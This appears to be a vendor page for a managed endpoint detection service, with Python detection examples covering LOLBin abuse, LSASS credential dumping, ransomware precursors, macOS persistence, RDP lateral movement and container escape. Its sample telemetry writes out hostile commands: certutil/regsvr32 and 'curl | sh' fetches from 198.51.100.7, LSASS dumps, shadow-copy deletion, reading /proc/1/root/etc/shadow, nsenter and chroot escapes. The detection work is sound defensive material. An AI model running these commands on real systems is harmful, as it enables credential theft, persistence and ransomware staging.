Managed EDR
Endpoint detection and response, tuned to your environment and managed by your FDSE.
Zaun's Managed EDR module provides endpoint detection and response that's tuned to your specific environment, not generic out-of-the-box rules that generate noise.
How It Works
Your FDSE works with your EDR platform to:
- Tune detection rules to your environment, reducing false positives
- Build custom detections for threats specific to your organization
- Create runbooks for every detection, so your team knows exactly how to respond
- Review findings and provide context before escalating
Supported EDR Platforms
| Platform | Full Support | Custom Detections | Managed Response |
|---|---|---|---|
| CrowdStrike Falcon | Yes | Yes | Yes |
| SentinelOne | Yes | Yes | Yes |
| Microsoft Defender for Endpoint | Yes | Yes | Partial |
| Carbon Black | Yes | Partial | Partial |
What Zaun Adds to Your EDR
Beyond Alert Triage
Most MDR providers just triage alerts. Zaun goes further:
- Detection Engineering: Custom rules built for your environment
- Runbook Documentation: Every detection has a documented response procedure
- Weekly Coverage Shipping: New detections deployed every week
- Tuning & Optimization: Continuous reduction of false positives
Investigation Transparency
Every finding includes:
- Full evidence trail showing what was analyzed
- Detection logic explanation
- Recommended next steps from the runbook
- Historical context for similar findings
Specific Use Cases
Living-off-the-Land Binary (LOLBin) Abuse
An attacker uses legitimate Windows binaries like certutil.exe, mshta.exe, or regsvr32.exe to download and execute malicious payloads, bypassing application allowlists. Stock EDR rules generate noise on these common admin tools. Your FDSE tunes CrowdStrike Falcon or SentinelOne detections to tell the difference between legitimate admin usage and attacker abuse based on your environment's baseline.
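The following is an added illustration of what that tuning looks like in practice; it is not Zaun's or any EDR vendor's detection code. The event fields are a simplified stand-in for CrowdStrike or SentinelOne process telemetry, and the baseline entry (a PKI service account refreshing CRLs via certutil), the account names, hosts and sample events are all constructed for the example.

```python
"""Tune a LOLBin rule against an environment baseline of known-good admin usage.

Added example, not Zaun's or any EDR vendor's detection code. The event fields
are a simplified stand-in for CrowdStrike/SentinelOne process telemetry; the
baseline entry, user names and sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass

LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe"}

# A stock rule fires on the binary alone, which is what makes it noisy. Here an
# alert needs an abuse indicator in the command line or a suspicious parent.
ABUSE_PATTERNS = {
    "certutil.exe": re.compile(r"-urlcache|-decode|-encode|https?://", re.I),
    "mshta.exe": re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe": re.compile(r"/i:https?://|scrobj\.dll", re.I),
}
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe", "powershell.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    image: str          # executable basename
    parent_image: str
    cmdline: str


@dataclass(frozen=True)
class BaselineEntry:
    """Known-good usage learned from the environment (hypothetical values)."""
    image: str
    parent_image: str
    cmdline_regex: str
    users: frozenset    # accounts allowed to run it; empty means any account


# Constructed baseline: a PKI service account refreshes CRLs from the internal CA
# via a scheduled task, so certutil -urlcache under svchost.exe is expected there.
BASELINE = [
    BaselineEntry(
        image="certutil.exe",
        parent_image="svchost.exe",
        cmdline_regex=r"^certutil\.exe -urlcache -split -f https://pki\.corp\.example/",
        users=frozenset({"CORP\\svc-pki"}),
    ),
]


def matches_baseline(ev: ProcessEvent, baseline=BASELINE) -> bool:
    for b in baseline:
        if ev.image.lower() != b.image or ev.parent_image.lower() != b.parent_image:
            continue
        if not re.search(b.cmdline_regex, ev.cmdline, re.I):
            continue
        if b.users and ev.user not in b.users:
            continue
        return True
    return False


def evaluate(ev: ProcessEvent, baseline=BASELINE):
    """Return None for no alert, or a dict explaining why the event was flagged."""
    image = ev.image.lower()
    if image not in LOLBINS:
        return None
    reasons = []
    if ABUSE_PATTERNS[image].search(ev.cmdline):
        reasons.append("abuse pattern in command line")
    if ev.parent_image.lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"spawned by {ev.parent_image}")
    if not reasons or matches_baseline(ev, baseline):
        return None     # nothing abusive, or tuned out by the environment baseline
    return {"host": ev.host, "user": ev.user, "image": image, "reasons": reasons}


# Constructed sample telemetry: one baselined admin task, two abuses, one benign run.
SAMPLE_EVENTS = [
    ProcessEvent("PKI01", "CORP\\svc-pki", "certutil.exe", "svchost.exe",
                 r"certutil.exe -urlcache -split -f https://pki.corp.example/crl/root.crl C:\ProgramData\crl\root.crl"),
    ProcessEvent("WS-042", "CORP\\jdoe", "certutil.exe", "WINWORD.EXE",
                 r"certutil.exe -urlcache -split -f http://198.51.100.7/a.txt C:\Users\jdoe\a.exe"),
    ProcessEvent("WS-017", "CORP\\asmith", "mshta.exe", "explorer.exe",
                 r'mshta.exe "C:\Program Files\Vendor\setup.hta"'),
    ProcessEvent("WS-042", "CORP\\jdoe", "regsvr32.exe", "cmd.exe",
                 r"regsvr32.exe /s /n /u /i:http://198.51.100.7/x.sct scrobj.dll"),
]


def run_samples(events=SAMPLE_EVENTS):
    """Alerts for the sample events; the PKI task and the local .hta run produce none."""
    return [a for a in (evaluate(ev) for ev in events) if a]


if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

The point of the baseline entry is that it is narrow: image, parent, a command-line pattern pinned to the internal CA hostname, and the one service account that should run it. A broader exclusion such as "ignore certutil -urlcache" would also silence the Word-spawned download in the second sample.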
Credential Dumping via LSASS
An attacker attempts to dump credentials from the LSASS process using tools like Mimikatz or ProcDump, or the MiniDump export of comsvcs.dll invoked through rundll32. Zaun detects the LSASS process-access event in CrowdStrike or Microsoft Defender for Endpoint telemetry and correlates it with the source process, its parent process, command line arguments, and user context before deciding whether it is a security product reading LSASS legitimately or a credential dump in progress.
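As an added illustration (not Zaun's or any vendor's logic), the scoring below shows how a single LSASS process-access event is enriched with the source image, the granted access mask, the command line, the parent and the account before it becomes a finding. The event shape is a simplified stand-in for CrowdStrike or Defender process-access telemetry; the allowlist of security products, the score thresholds, the hosts and the sample events are constructed.

```python
"""Correlate an LSASS process-access event with its source, parent, command line and user.

Added example, not Zaun's or any EDR vendor's logic. The event shape is a
simplified stand-in for CrowdStrike/Defender process-access telemetry; the
allowlist, thresholds, hosts and sample events are constructed for illustration.
"""
import ntpath
import re
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010          # the access right needed to read LSASS memory
DUMP_TOOLS = {"procdump.exe", "procdump64.exe", "mimikatz.exe"}
COMSVCS_MINIDUMP = re.compile(r"comsvcs(\.dll)?[\s,]+(#24|minidump)", re.I)
SCRIPT_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
SYSTEM_ACCOUNTS = {"NT AUTHORITY\\SYSTEM", "NT AUTHORITY\\LOCAL SERVICE",
                   "NT AUTHORITY\\NETWORK SERVICE"}

# Hypothetical per-environment allowlist: security components expected to open LSASS.
KNOWN_GOOD_SOURCES = {"msmpeng.exe", "csfalconservice.exe", "sentinelagent.exe"}


@dataclass(frozen=True)
class ProcessAccessEvent:
    host: str
    user: str               # account the source process runs as
    source_image: str       # full path of the process opening the handle
    parent_image: str
    cmdline: str
    target_image: str
    granted_access: int     # access mask granted on the handle


def assess(ev: ProcessAccessEvent):
    """Return None, or a dict with a severity and the evidence behind it."""
    if ntpath.basename(ev.target_image).lower() != "lsass.exe":
        return None
    source = ntpath.basename(ev.source_image).lower()
    if source in KNOWN_GOOD_SOURCES:
        return None
    score, reasons = 0, []
    if ev.granted_access & PROCESS_VM_READ:
        score += 40
        reasons.append(f"handle grants PROCESS_VM_READ (0x{ev.granted_access:x})")
    if source in DUMP_TOOLS:
        score += 50
        reasons.append(f"known dump tool {source}")
    if COMSVCS_MINIDUMP.search(ev.cmdline):
        score += 50
        reasons.append("comsvcs.dll MiniDump export in command line")
    parent = ntpath.basename(ev.parent_image).lower()
    if parent in SCRIPT_PARENTS:
        score += 10
        reasons.append(f"launched from {parent}")
    if ev.user not in SYSTEM_ACCOUNTS:
        score += 10
        reasons.append(f"running as non-system account {ev.user}")
    severity = "high" if score >= 60 else "medium" if score >= 40 else None
    if severity is None:
        return None
    return {"host": ev.host, "severity": severity, "score": score,
            "source": source, "reasons": reasons}


# Constructed sample telemetry (field order: host, user, source, parent, cmdline, target, access).
SAMPLE_EVENTS = [
    # Defender's engine reading LSASS: allowlisted for this environment.
    ProcessAccessEvent("WS-042", "NT AUTHORITY\\SYSTEM",
                       r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
                       r"C:\Windows\System32\services.exe", "MsMpEng.exe",
                       r"C:\Windows\System32\lsass.exe", 0x1FFFFF),
    # rundll32 + comsvcs.dll MiniDump from a cmd shell as a normal user.
    ProcessAccessEvent("WS-042", "CORP\\jdoe",
                       r"C:\Windows\System32\rundll32.exe", r"C:\Windows\System32\cmd.exe",
                       r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 612 C:\Temp\l.dmp full",
                       r"C:\Windows\System32\lsass.exe", 0x1FFFFF),
    # ProcDump launched from PowerShell.
    ProcessAccessEvent("WS-017", "CORP\\asmith",
                       r"C:\Tools\procdump64.exe",
                       r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                       r"procdump64.exe -accepteula -ma lsass.exe C:\Temp\lsass.dmp",
                       r"C:\Windows\System32\lsass.exe", 0x1410),
    # Performance tooling querying LSASS without VM_READ: below threshold, no alert.
    ProcessAccessEvent("WS-017", "CORP\\asmith",
                       r"C:\Windows\System32\perfmon.exe", r"C:\Windows\explorer.exe",
                       "perfmon.exe", r"C:\Windows\System32\lsass.exe", 0x1000),
]


def run_samples(events=SAMPLE_EVENTS):
    return [r for r in (assess(ev) for ev in events) if r]


if __name__ == "__main__":
    for finding in run_samples():
        print(finding)
```

The allowlist is keyed on the image name only to keep the example short; in production it should also require the source binary's signer, since renaming a dumper to MsMpEng.exe is a cheap bypass.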
Ransomware Precursor Activity
Before deploying ransomware, attackers typically disable security tools, delete shadow copies, and stage data for exfiltration. Zaun builds multi-stage detections in SentinelOne or CrowdStrike that chain together:
- `vssadmin delete shadows` or `wmic shadowcopy delete`
- Service stop commands targeting backup and security services
- Rapid file enumeration across network shares
- Unusual use of archival tools like `7z.exe` or `rar.exe`
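The chaining itself, as an added example that is not Zaun's or any vendor's detection logic: stages are recognised per event, the share sweep is derived from a burst of distinct UNC paths, and a host only produces a finding when at least two distinct stages land inside one time window. Events are a simplified stand-in for SentinelOne or CrowdStrike process and file telemetry; the window, thresholds, service keywords, hostnames, timestamps and sample events are constructed.

```python
"""Chain ransomware precursor stages per host inside a time window.

Added example, not Zaun's or any EDR vendor's detection logic. Events are a
simplified stand-in for SentinelOne/CrowdStrike process and file telemetry;
service keywords, thresholds, hostnames, timestamps and samples are constructed.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=15)   # stages must co-occur within this window
MIN_STAGES = 2                   # one stage alone is routine admin work
SHARE_ENUM_THRESHOLD = 200       # distinct UNC paths touched inside WINDOW
SERVICE_KEYWORDS = ("veeam", "backup", "vss", "sql", "windefend", "msmp", "sense", "falcon", "sentinel")


def stage_of(ev):
    """Map one process event to a precursor stage, or None."""
    image, cmd = ev["image"].lower(), ev["cmdline"].lower()
    if image == "vssadmin.exe" and "delete shadows" in cmd:
        return "shadow_delete"
    if image == "wmic.exe" and "shadowcopy delete" in cmd:
        return "shadow_delete"
    if image in ("net.exe", "net1.exe", "sc.exe") and re.search(r"\bstop\b", cmd) \
            and any(k in cmd for k in SERVICE_KEYWORDS):
        return "service_stop"
    if image in ("7z.exe", "rar.exe") and re.search(r"\s-p\S+|\s-v\d+[kmg]?\b|\\\\", cmd):
        return "archive"     # password-protected, split into volumes, or sourced from a share
    return None


def share_enum_stages(file_events):
    """Emit a share_enum stage when a host reads many distinct UNC paths inside WINDOW."""
    by_host = defaultdict(list)
    for ev in file_events:
        if ev["path"].startswith("\\\\"):
            by_host[ev["host"]].append((ev["ts"], ev["path"]))
    stages = []
    for host, reads in by_host.items():
        reads.sort()
        for i, (ts, _) in enumerate(reads):
            paths = {p for t, p in reads[:i + 1] if t >= ts - WINDOW}
            if len(paths) >= SHARE_ENUM_THRESHOLD:
                stages.append((host, ts, "share_enum", f"{len(paths)} distinct share paths read"))
                break
    return stages


def correlate(events):
    """Return {host: alert} for hosts showing MIN_STAGES distinct stages inside WINDOW."""
    staged = []
    for ev in events:
        if ev["type"] == "process":
            s = stage_of(ev)
            if s:
                staged.append((ev["host"], ev["ts"], s, ev["cmdline"]))
    staged += share_enum_stages([e for e in events if e["type"] == "file_read"])
    by_host = defaultdict(list)
    for host, ts, s, detail in staged:
        by_host[host].append((ts, s, detail))
    alerts = {}
    for host, items in by_host.items():
        items.sort()
        for i, (ts, _, _) in enumerate(items):
            recent = [x for x in items[:i + 1] if x[0] >= ts - WINDOW]
            if len({s for _, s, _ in recent}) >= MIN_STAGES:
                # Trigger here, then keep collecting evidence for one more window.
                evidence = recent + [x for x in items[i + 1:] if x[0] <= ts + WINDOW]
                alerts[host] = {
                    "triggered": ts,
                    "stages": sorted({s for _, s, _ in evidence}),
                    "evidence": [(t.isoformat(), d) for t, _, d in evidence],
                }
                break
    return alerts


T0 = datetime(2024, 5, 6, 10, 0, 0)   # constructed timestamps


def proc(host, minutes, image, cmdline):
    return {"type": "process", "host": host, "ts": T0 + timedelta(minutes=minutes),
            "image": image, "cmdline": cmdline}


# Constructed telemetry: a backup server rotating shadows (benign, one stage) and a
# workstation that stops services, wipes shadows, sweeps a share and stages an archive.
SAMPLE_EVENTS = [
    proc("SRV-BKP01", -30, "vssadmin.exe", "vssadmin delete shadows /for=C: /oldest /quiet"),
    proc("WS-042", 0, "net.exe", "net stop VeeamBackupSvc /y"),
    proc("WS-042", 1, "sc.exe", "sc stop WinDefend"),
    proc("WS-042", 3, "vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    proc("WS-042", 7, "7z.exe", r"7z.exe a -pH4ck3d -v500m C:\Users\Public\out.7z \\fs01\finance"),
] + [
    {"type": "file_read", "host": "WS-042", "ts": T0 + timedelta(minutes=4, milliseconds=200 * i),
     "path": f"\\\\fs01\\finance\\doc{i}.xlsx"}
    for i in range(250)
]


def run_samples(events=SAMPLE_EVENTS):
    return correlate(events)


if __name__ == "__main__":
    for host, alert in run_samples().items():
        print(host, alert["triggered"], alert["stages"])
```

The backup server's nightly `vssadmin delete shadows /oldest` is exactly the event a stock single-stage rule would page on; here it never reaches the threshold, while the workstation fires the moment the second stage appears and then accumulates the share sweep and the archive as evidence.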
macOS Persistence via LaunchAgent
An attacker installs a LaunchAgent or LaunchDaemon plist on macOS endpoints to maintain persistence. Default EDR rules may not cover every launchd location, and those that do tend to fire on legitimate installers. Your FDSE writes custom detections for CrowdStrike Falcon that monitor plist creation in ~/Library/LaunchAgents/, /Library/LaunchAgents/ and /Library/LaunchDaemons/, inspect the program the plist launches, and exclude known-good software in your environment.
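An added example of such a detection, not Zaun's or CrowdStrike's code: given the path and contents of a newly written plist, it parses the file, resolves the program launchd would run, applies an environment allowlist, and flags programs living in temp or hidden directories or persisted as interpreter one-liners. The allowlist entries, the user names, the sample plists and the 198.51.100.7 address are constructed.

```python
"""Flag new LaunchAgent/LaunchDaemon plists, with exclusions for known-good software.

Added example, not Zaun's or CrowdStrike's detection code. It parses the plist
that a file-write event delivered; the allowlist, user names and sample plists
are constructed for illustration.
"""
import fnmatch
import plistlib
import posixpath
import re

WATCHED_DIRS = re.compile(
    r"^(/Library/LaunchDaemons/|/Library/LaunchAgents/|/Users/[^/]+/Library/LaunchAgents/)")
INTERPRETERS = {"sh", "bash", "zsh", "osascript", "python", "python3", "perl", "curl"}
ONE_LINER = re.compile(r"\s-c\s|base64|curl\s|\|\s*(ba)?sh\b", re.I)
ODD_LOCATION = re.compile(r"^(/private)?/(tmp|var/tmp)/|^/Users/Shared/|/\.[^/]+/")

# Hypothetical environment allowlist: label glob -> program path glob.
KNOWN_GOOD = {
    "com.corp.mdmagent": "/Library/Corp/MDMAgent.app/Contents/MacOS/*",
    "com.corp.backup.*": "/Library/Application Support/CorpBackup/*",
}


def program_of(pl):
    """Resolve the executable and argument vector from Program/ProgramArguments."""
    args = list(pl.get("ProgramArguments") or [])
    program = pl.get("Program") or (args[0] if args else "")
    return program, (args or [program])


def evaluate_plist(path, data):
    """Return None or an alert for a plist written to `path` with contents `data`."""
    if not WATCHED_DIRS.match(path):
        return None                          # not a launchd persistence location
    pl = plistlib.loads(data)
    label = pl.get("Label", "")
    program, args = program_of(pl)
    for label_glob, program_glob in KNOWN_GOOD.items():
        if fnmatch.fnmatch(label, label_glob) and fnmatch.fnmatch(program, program_glob):
            return None                      # excluded: known-good in this environment
    reasons = []
    if ODD_LOCATION.search(program):
        reasons.append("program lives in a temp, shared or hidden directory")
    if posixpath.basename(program) in INTERPRETERS and ONE_LINER.search(" ".join(args)):
        reasons.append("interpreter one-liner as the persisted program")
    if not reasons:
        return None
    if pl.get("RunAtLoad") or pl.get("KeepAlive"):
        reasons.append("RunAtLoad/KeepAlive set, runs without user action")
    return {"path": path, "label": label, "program": program, "reasons": reasons}


def plist(d):
    """Serialise a dict as an XML plist, as the file-write event would carry it."""
    return plistlib.dumps(d)


# Constructed writes: allowlisted MDM agent, a curl|sh agent, a hidden-path binary,
# a vendor daemon that matches nothing, and a plist outside the watched directories.
SAMPLE_WRITES = [
    ("/Library/LaunchDaemons/com.corp.mdmagent.plist",
     plist({"Label": "com.corp.mdmagent",
            "ProgramArguments": ["/Library/Corp/MDMAgent.app/Contents/MacOS/mdmagent", "--daemon"],
            "RunAtLoad": True, "KeepAlive": True})),
    ("/Users/jdoe/Library/LaunchAgents/com.apple.softwareupdatez.plist",
     plist({"Label": "com.apple.softwareupdatez",
            "ProgramArguments": ["/bin/sh", "-c", "curl -s http://198.51.100.7/p | sh"],
            "RunAtLoad": True})),
    ("/Users/jdoe/Library/LaunchAgents/com.corp.sync.plist",
     plist({"Label": "com.corp.sync", "Program": "/Users/jdoe/Library/.cache/sync",
            "KeepAlive": True})),
    ("/Library/LaunchDaemons/com.vendor.updater.plist",
     plist({"Label": "com.vendor.updater",
            "Program": "/Library/Application Support/Vendor/updater", "StartInterval": 3600})),
    ("/Users/jdoe/Desktop/notes.plist", plist({"Label": "scratch"})),
]


def run_samples(writes=SAMPLE_WRITES):
    return [a for a in (evaluate_plist(p, d) for p, d in writes) if a]


if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

Exclusions are matched on both the label and the program path; an allowlist keyed on the label alone would let an attacker reuse a trusted label such as com.corp.mdmagent with a different program.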
Lateral Movement via RDP and SMB
After initial compromise, an attacker moves laterally using Remote Desktop Protocol (RDP) or SMB with stolen credentials. Zaun detects unusual RDP login patterns, like a workstation-to-workstation RDP session or RDP from a non-admin user, by analyzing CrowdStrike or Defender authentication telemetry.
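An added example of that logon analysis (not Zaun's detection logic): each record is a simplified stand-in for a Windows 4624 logon as surfaced by CrowdStrike or Defender, hosts are classified by a naming convention, and RemoteInteractive logons are scored on the source/target classes and on whether the account is in the RDP admin group. The naming convention, the jump hosts, the admin group snapshot and the sample logons are constructed for the example.

```python
"""Flag unusual RDP logons in authentication telemetry.

Added example, not Zaun's detection logic. A Logon record is a simplified
stand-in for a Windows 4624 event as surfaced by CrowdStrike or Defender; the
host naming convention, jump hosts, admin group snapshot and sample logons
are constructed for illustration.
"""
import re
from dataclasses import dataclass

LOGON_TYPE_REMOTE_INTERACTIVE = 10                 # RDP, in 4624 terms
WORKSTATION_NAME = re.compile(r"^WS-\d+$", re.I)     # hypothetical naming convention
JUMP_HOSTS = {"JUMP01", "JUMP02"}                    # hypothetical sanctioned RDP sources
RDP_ADMINS = {"CORP\\it-admin", "CORP\\asmith"}      # hypothetical group membership snapshot


@dataclass(frozen=True)
class Logon:
    target_host: str
    source_host: str    # workstation-name field; an IP when the name did not resolve
    user: str
    logon_type: int


def host_class(name):
    if name.upper() in JUMP_HOSTS:
        return "jump"
    if WORKSTATION_NAME.match(name):
        return "workstation"
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", name):
        return "unresolved"
    return "server"


def evaluate(logon):
    """Return None or an alert; only RemoteInteractive logons are considered."""
    if logon.logon_type != LOGON_TYPE_REMOTE_INTERACTIVE:
        return None
    src, dst = host_class(logon.source_host), host_class(logon.target_host)
    if src == "jump" and logon.user in RDP_ADMINS:
        return None                          # the sanctioned admin path
    reasons = []
    if src == "workstation" and dst == "workstation":
        reasons.append("workstation-to-workstation RDP")
    if logon.user not in RDP_ADMINS:
        reasons.append(f"{logon.user} is not in the RDP admin group")
    if src == "unresolved":
        reasons.append(f"source {logon.source_host} did not resolve to a known host")
    if dst == "server" and src != "jump":
        reasons.append("server RDP not via a jump host")   # hypothetical policy
    if not reasons:
        return None
    high = any(r.startswith("workstation-to-workstation") or "admin group" in r for r in reasons)
    return {"target": logon.target_host, "source": logon.source_host, "user": logon.user,
            "severity": "high" if high else "medium", "reasons": reasons}


# Constructed sample logons.
SAMPLE_LOGONS = [
    Logon("WS-017", "WS-042", "CORP\\jdoe", 10),           # peer-to-peer RDP by a non-admin
    Logon("SRV-DB01", "JUMP01", "CORP\\asmith", 10),       # admin via the jump host
    Logon("SRV-FS01", "WS-017", "CORP\\jdoe", 3),          # network logon (SMB), not RDP
    Logon("SRV-DB01", "10.20.30.40", "CORP\\asmith", 10),  # admin from an unresolved source
    Logon("SRV-APP02", "WS-017", "CORP\\asmith", 10),      # admin straight from a workstation
]


def run_samples(logons=SAMPLE_LOGONS):
    return [a for a in (evaluate(l) for l in logons) if a]


if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

The group snapshot is what makes "RDP from a non-admin user" a cheap check; it has to be refreshed from the directory on a schedule, otherwise a freshly added attacker-controlled admin account looks like a non-admin and a removed admin keeps the exemption.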
Supply Chain Binary Execution
A compromised update for a legitimate tool (e.g., a signed binary from a trusted vendor) executes unexpected child processes or makes network connections to command-and-control infrastructure. Zaun builds detections that baseline expected process trees for your installed software and flag deviations.
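Below is an added example of the baselining approach (not Zaun's detection code): it learns, from a period of telemetry, which child images and network destinations each installed tool normally produces, ignores one-off observations, and then reports any child or destination that falls outside that set. Events are a simplified stand-in for EDR process and network telemetry; the tool names, hosts and destinations are constructed, and updates.vendor.example uses a reserved example domain.

```python
"""Baseline expected process trees and network destinations per installed tool, then flag deviations.

Added example, not Zaun's detection code. Events are a simplified stand-in for
EDR process and network telemetry; the vendor names and destinations are
constructed (updates.vendor.example is a reserved example domain).
"""
from collections import Counter, defaultdict


class ProcessTreeBaseline:
    """Learn which children and destinations each parent image normally produces."""

    def __init__(self, min_count=2):
        self.min_count = min_count               # ignore one-off observations when baselining
        self.children = defaultdict(Counter)     # parent image -> child image -> count
        self.dests = defaultdict(Counter)        # image -> "host:port" -> count

    def learn(self, events):
        for ev in events:
            if ev["type"] == "process":
                self.children[ev["parent"].lower()][ev["child"].lower()] += 1
            elif ev["type"] == "network":
                self.dests[ev["image"].lower()][ev["dest"].lower()] += 1

    def _expected(self, counter):
        return sorted(k for k, n in counter.items() if n >= self.min_count)

    def check(self, ev):
        """Return None if the event matches the baseline, else a deviation record."""
        if ev["type"] == "process":
            parent, child = ev["parent"].lower(), ev["child"].lower()
            if parent not in self.children:
                return None                      # no baseline for this software yet
            if self.children[parent][child] >= self.min_count:
                return None
            return {"kind": "unexpected_child", "parent": parent, "child": child,
                    "expected": self._expected(self.children[parent])}
        if ev["type"] == "network":
            image, dest = ev["image"].lower(), ev["dest"].lower()
            if image not in self.dests or self.dests[image][dest] >= self.min_count:
                return None
            return {"kind": "unexpected_destination", "image": image, "dest": dest,
                    "expected": self._expected(self.dests[image])}
        return None


# Constructed baseline period for a hypothetical "vendor-updater.exe" across the fleet.
BASELINE_EVENTS = (
    [{"type": "process", "parent": "vendor-updater.exe", "child": "vendor-agent.exe"}] * 40
    + [{"type": "process", "parent": "vendor-updater.exe", "child": "vendor-helper.exe"}] * 12
    + [{"type": "process", "parent": "vendor-updater.exe", "child": "conhost.exe"}]   # seen once
    + [{"type": "network", "image": "vendor-updater.exe", "dest": "updates.vendor.example:443"}] * 52
)

# Constructed telemetry after a hypothetical trojanised update is installed.
NEW_EVENTS = [
    {"type": "process", "parent": "vendor-updater.exe", "child": "vendor-agent.exe"},
    {"type": "process", "parent": "vendor-updater.exe", "child": "powershell.exe"},
    {"type": "network", "image": "vendor-updater.exe", "dest": "198.51.100.7:443"},
    {"type": "network", "image": "vendor-updater.exe", "dest": "updates.vendor.example:443"},
    {"type": "process", "parent": "other-tool.exe", "child": "cmd.exe"},   # never baselined
]


def run_samples():
    baseline = ProcessTreeBaseline(min_count=2)
    baseline.learn(BASELINE_EVENTS)
    return [d for d in (baseline.check(ev) for ev in NEW_EVENTS) if d]


if __name__ == "__main__":
    for deviation in run_samples():
        print(deviation)
```

Software with no baseline is deliberately not flagged here; in practice it should be surfaced separately as coverage gap, since a brand-new installer is exactly where a supply-chain payload would first appear.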
Linux Container Escape
An attacker breaks out of a Docker container on a production Linux host by exploiting a kernel vulnerability or misconfigured capabilities. Zaun monitors CrowdStrike Falcon for Linux or SentinelOne for container escape indicators like nsenter usage, chroot calls, or unexpected mount operations from container processes.
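As an added example (not Zaun's or any vendor's logic), the rule below uses the acting process's cgroup path to decide whether it is a container process at all, and only then looks for the indicators above: nsenter into host namespaces, chroot, reads through /proc/1/root, or a mount of a host block device. Events are a simplified stand-in for Falcon for Linux or SentinelOne process and mount telemetry; the cgroup layouts, the runtime allowlist, the node name and the sample events are constructed.

```python
"""Flag container-escape indicators only for processes that run inside a container.

Added example, not Zaun's or any EDR vendor's logic. Events are a simplified
stand-in for Falcon for Linux / SentinelOne process and mount telemetry that
carries the acting process's cgroup path; the cgroup layouts, runtime allowlist
and sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass

# Container id as it appears in docker, containerd (cri-containerd-<id>.scope) and cri-o cgroup paths.
CONTAINER_CGROUP = re.compile(r"(docker|containerd|crio)[-/]([0-9a-f]{12,64})")
RUNTIME_IMAGES = {"runc", "containerd-shim-runc-v2", "dockerd", "containerd"}   # hypothetical allowlist
HOST_BLOCK_DEVICE = re.compile(r"^/dev/(sd[a-z]|nvme\d+n\d+|vd[a-z]|xvd[a-z])")
NSENTER_ESCAPE = re.compile(r"(-t|--target)\s*1\b|--all|(^|\s)-[a-z]*m|--mount")
HOST_PID1 = re.compile(r"/proc/1/(root|ns|cwd)")


@dataclass(frozen=True)
class Event:
    kind: str         # "exec" or "mount"
    host: str
    cgroup: str       # cgroup path of the acting process
    image: str        # executable basename
    cmdline: str
    source: str = ""  # mount source (device or fs type) for mount events
    target: str = ""  # mount point for mount events


def container_id(cgroup):
    """Short container id if the cgroup path belongs to a container, else None."""
    m = CONTAINER_CGROUP.search(cgroup)
    return m.group(2)[:12] if m else None


def evaluate(ev):
    cid = container_id(ev.cgroup)
    if cid is None or ev.image in RUNTIME_IMAGES:
        return None                      # host process, or the runtime's own helpers
    reasons = []
    if ev.kind == "exec":
        if ev.image == "nsenter" and NSENTER_ESCAPE.search(ev.cmdline):
            reasons.append("nsenter into host namespaces")
        if ev.image == "chroot":
            reasons.append("chroot from inside a container")
        if HOST_PID1.search(ev.cmdline):
            reasons.append("access to host PID 1 root or namespaces via /proc")
    elif ev.kind == "mount" and HOST_BLOCK_DEVICE.match(ev.source):
        reasons.append(f"mount of host block device {ev.source} at {ev.target}")
    if not reasons:
        return None
    return {"host": ev.host, "container": cid, "image": ev.image, "reasons": reasons}


# Constructed cgroup paths: a docker container, a sshd session on the host, and a
# Kubernetes pod under containerd.
DOCKER_CG = "/docker/3f1c2b9a8e7d4c5b6a7f8e9d0c1b2a3f4e5d6c7b8a9f0e1d2c3b4a5f6e7d8c9b"
HOST_CG = "/system.slice/sshd.service"
K8S_CG = ("/kubepods.slice/kubepods-burstable.slice/kubepods-burstable-pod1a2b.slice/"
          "cri-containerd-9c8d7e6f5a4b3c2d1e0f9a8b7c6d5e4f3a2b1c0d9e8f7a6b5c4d3e2f1a0b9c8d.scope")

SAMPLE_EVENTS = [
    Event("exec", "node01", DOCKER_CG, "nsenter", "nsenter -t 1 -m -u -i -n -- /bin/sh"),
    Event("exec", "node01", HOST_CG, "nsenter", "nsenter -t 1 -m -u -i -n -- /bin/sh"),   # admin on host
    Event("mount", "node01", K8S_CG, "mount", "mount /dev/sda1 /mnt/host",
          source="/dev/sda1", target="/mnt/host"),
    Event("mount", "node01", DOCKER_CG, "mount", "mount -t tmpfs tmpfs /tmp",
          source="tmpfs", target="/tmp"),                                                  # benign
    Event("exec", "node01", K8S_CG, "sh", "sh -c cat /proc/1/root/etc/shadow"),
    Event("exec", "node01", DOCKER_CG, "runc", "runc init"),                               # runtime
    Event("exec", "node01", DOCKER_CG, "chroot", "chroot /host /bin/bash"),
]


def run_samples(events=SAMPLE_EVENTS):
    return [a for a in (evaluate(ev) for ev in events) if a]


if __name__ == "__main__":
    for alert in run_samples():
        print(alert)
```

The cgroup check is what keeps this quiet on the host itself: the same nsenter command typed by an administrator over SSH produces nothing, while from a container it is the textbook escape from a process granted CAP_SYS_ADMIN or host PID namespace access.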
Integrations
| Integration | Signal Type | What It Provides |
|---|---|---|
| CrowdStrike Falcon | Endpoint telemetry | Process execution, file writes, network connections, DNS |
| SentinelOne Singularity | Endpoint telemetry | Storyline-based process trees, threat indicators |
| Microsoft Defender for Endpoint | Endpoint telemetry | Process events, network connections, file activity |
| Carbon Black Cloud | Endpoint telemetry | Process execution, binary analysis, network |
| CrowdStrike Falcon Identity | Identity signals | Lateral movement, credential theft, AD changes |
| Slack | Alert delivery | Finding notifications, runbook links, escalation |
| PagerDuty | Incident mgmt | On-call routing, incident creation, escalation |
| Jira | Ticketing | Finding tracking, investigation documentation |
| MITRE ATT&CK | Framework | Detection mapping to techniques and sub-techniques |
Configuration
```yaml
# Example: EDR monitoring policy
edr:
